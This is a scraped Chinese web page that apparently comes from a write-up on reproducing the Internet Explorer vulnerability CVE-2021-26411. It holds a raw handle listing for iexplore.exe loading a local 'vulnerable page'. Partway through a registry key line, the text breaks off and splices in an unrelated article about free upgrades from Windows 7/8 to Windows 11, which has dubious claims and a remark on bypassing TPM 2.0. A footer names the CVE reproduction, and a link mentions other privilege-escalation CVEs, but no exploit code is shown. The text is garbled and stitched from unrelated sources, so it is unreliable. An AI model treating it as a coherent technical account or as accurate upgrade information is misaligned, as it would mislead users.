\\Sessions\\1\\BaseNamedObjects\\windows_webcache_counters_9B6AB5B3-91BC-4097-835C-EA2DEC95E9CC_S-1-5-21-2730912745-1723166478-227975165-1000 Section \\BaseNamedObjects\\__ComCatalogCache__ Section \\Windows\\Theme570511858 Section \\Sessions\\1\\Windows\\Theme2608543160 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateSharedMem Section \\Sessions\\1\\BaseNamedObjects\\VERMGMTSharedMemory Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeUntrusted_1:8_1 Section \\Sessions\\1\\BaseNamedObjects\\UrlZonesSM_bonelee Section \\BaseNamedObjects\\F932B6C7-3A20-46A0-B8A0-8894AA421973 Section \\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:20d32 Section \\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:20d32 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:0_b Section \\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section \\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db Section \\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section \\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:6_2 Section \\Sessions\\1\\BaseNamedObjects\\windows_ie_global_counters Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_1 Section \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_6 Section \\Sessions\\1\\BaseNamedObjects\\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_7B0E6F39_C::USERS:BONELEE:APPDATA:LOCAL:MICROSOFT:WINDOWS:INETCACHE:LOW:SUGGESTEDSITES.DAT Section \\BaseNamedObjects\\windows_shell_global_counters Section \\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:40d38 Section \\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:40d38 Semaphore \\Sessions\\1\\BaseNamedObjects\\SM0:4808:168:WilStaging_02_p0 Semaphore \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateQuery Semaphore \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateReply Semaphore \\Sessions\\1\\BaseNamedObjects\\SM0:4808:64:WilError_02_p0 Thread iexplore.exe(4808): 4028 Thread iexplore.exe(4808): 248 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 248 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 9988 Thread iexplore.exe(4808): 2856 Thread iexplore.exe(4808): 2856 Thread iexplore.exe(4808): 8284 Thread iexplore.exe(4808): 3976 Thread iexplore.exe(4808): 1368 Thread iexplore.exe(4808): 7892 Thread iexplore.exe(4808): 6984 Thread iexplore.exe(4808): 9676 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 5496 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 1848 Thread iexplore.exe(4808): 1848 WindowStation \\Sessions\\1\\Windows\\WindowStations\\WinSta0 WindowStation \\Sessions\\1\\Windows\\WindowStations\\WinSta0
有漏洞页面的加载情况:
Process: iexplore.exe Pid: 2280 Type Name ALPC Port \\RPC Control\\OLECEAAAE2A0BE4602DC4230B1E60C4 ALPC Port \\BaseNamedObjects\\[CoreUI]-PID(2280)-TID(3540) 368f8175-585c-4d74-8abb-bc017bcb0711 Desktop \\Default Directory \\KnownDlls Directory \\KnownDlls32 Directory \\KnownDlls32 Directory \\Sessions\\1\\BaseNamedObjects Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_exhaustion_2230 Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_31402_7b Event \\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_31402_7c Event \\KernelObjects\\MaximumCommitCondition File C:\\Windows File C:\\Users\\bonelee\\Desktop File \\Device\\CNG File C:\\Program Files (x86)\\Internet Explorer\\zh-CN\\iexplore.exe.mui File C:\\Users\\bonelee\\Desktop\\1809.html File \\Device\\DeviceApi File \\Device\\KsecDD File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51 File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734 File C:\\Windows\\Registration\\R000000000006.clb File \\Device\\Nsi File C:\\Windows\\SysWOW64\\zh-CN\\ieframe.dll.mui File C:\\Windows\\SysWOW64\\zh-CN\\propsys.dll.mui File C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51 File C:\\Windows\\Fonts\\StaticCache.dat File C:\\Windows\\SysWOW64\\zh-CN\\urlmon.dll.mui File C:\\Windows\\SysWOW64\\zh-CN\\mshtml.dll.mui File C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat File C:\\Windows\\System32\\zh-CN\\mlang.dll.mui File C:\\Windows\\SysWOW64\\scrrun.dll File C:\\Windows\\System32\\zh-CN\\KernelBase.dll.mui File C:\\Windows\\SysWOW64\\zh-CN\\netmsg.dll.mui File C:\\Windows\\System32\\en-US\\imageres.dll.mui Key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options Key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options Key HKLM\\SYSTEM\\ControlSet001\\Control\\Session Manager Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale Key HKLM Key HKLM Key HKLM\\SOFTWARE\\Microsoft\\Ole Key HKCU\\Software\\Classes\\Local Settings\\Software\\Microsoft Key HKCU\\Software\\Classes\\Local Settings Key HKCU Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl Key HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids Key HKLM\\SOFTWARE\\WOW6432Node Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache Key HKLM\\SOFTWARE\\Policies Key HKCU\\Software\\Policies Key HKCU\\Software Key HKCU\\Software\\Microsoft\\Internet Explorer Key HKCU\\Software\\Classes Key HKCU\\Software\\Classes Key HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime Key HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime\\ActivatableClassId Key HKCU\\Software\\Classes Key HKU Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer Key HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage Key HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5 Key HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\Protocol_Catalog9 Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\1AC14E77-02E7-4E5D-B744-2EB1AE5198B7\\PropertyBag Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\P3P\\History Key HKCU\\Software\\Classes Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts Key HKCU\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKCU\\Software\\Classes\\MIME\\Database\\Content Type\\text/xml Key HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Extension Validation Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings Key HKCU\\Software\\Microsoft\\Internet Explorer\\Main Key HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main Key HKCU\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation Key不止 Windows 10!Windows 7/8 也能免费升级到 Windows 11
起初,微软宣布为 Windows 7、Windows 8 和 Windows 8.1 用户提供的 Windows 10 免费升级于 2016 年结束。
Windows 11 免费升级
近日,微软表示将继续支持从 Windows 7、Windows 8 和 Windows 8.1 用户免费升级到 Windows 10 或 Windows 11 ,只要他们满足最低系统要求。
Windows 11 的早期预览版已经包含 Windows 7、Windows 8 和 Windows 8.1 的配置密钥,允许用户免费升级。
对于使用受支持硬件的 Windows 10 用户,在 Windows 11 正式版发布后可以通过以下路径免费升级到 Windows 11
Windows 更新
媒体创建工具
Windows 更新助手(易升)
Windows Server Update Services(WSUS)
如果您的电脑不满足最低要求,可以绕过 TPM 2.0 要求,升级硬件或尝试使用 PE 安装。
Windows 10 将继续支持
当然,如果您不喜欢全新的 Windows 11 操作系统,您可以随时返回到 Windows 10 操作系统。微软承诺将对 Windows 10 的支持延续到 2025 年 10 月 14 日。
在 2025 年 10 月 14 日之前,微软将继续支持至少一个 Windows 10 家庭版、专业版、专业教育版、专业工作站版的半年频道,但不包括 Windows Insider 预览体验成员版和 Windows 10 企业版 LTSC。
Windows 11 应用程序兼容性
Windows 11 和 Windows 7 操作系统有很大的不同,但微软承诺你现有的应用程序将继续工作。
微软表示 Windows 11 的构建考虑到了兼容性。因此,如果您现有的应用程序在 Windows 7、Windows 8、Windows 8.1 和 Windows 10 上运行,它们将继续在 Windows 11 中得到支持。
Windows 11 正式版何时推出
微软计划在今年下半年推出 Windows 11 正式版,这意味着一旦可用,您可以手动更新到全新的 Windows 11。
但对于大多数目前在用 Windows 10 电脑,微软计划于 2022 年初推出免费升级。
关注视频号
看 Windows 11
更多精彩动态(*^▽^*)
喜欢这篇文章就点「 在看」
阅读原文了解更多
以上是关于windows 10下复现CVE-2021-26411漏洞的主要内容,如果未能解决你的问题,请参考以下文章
cve-2019-1388复现+烂土豆+CVE-2019-0803
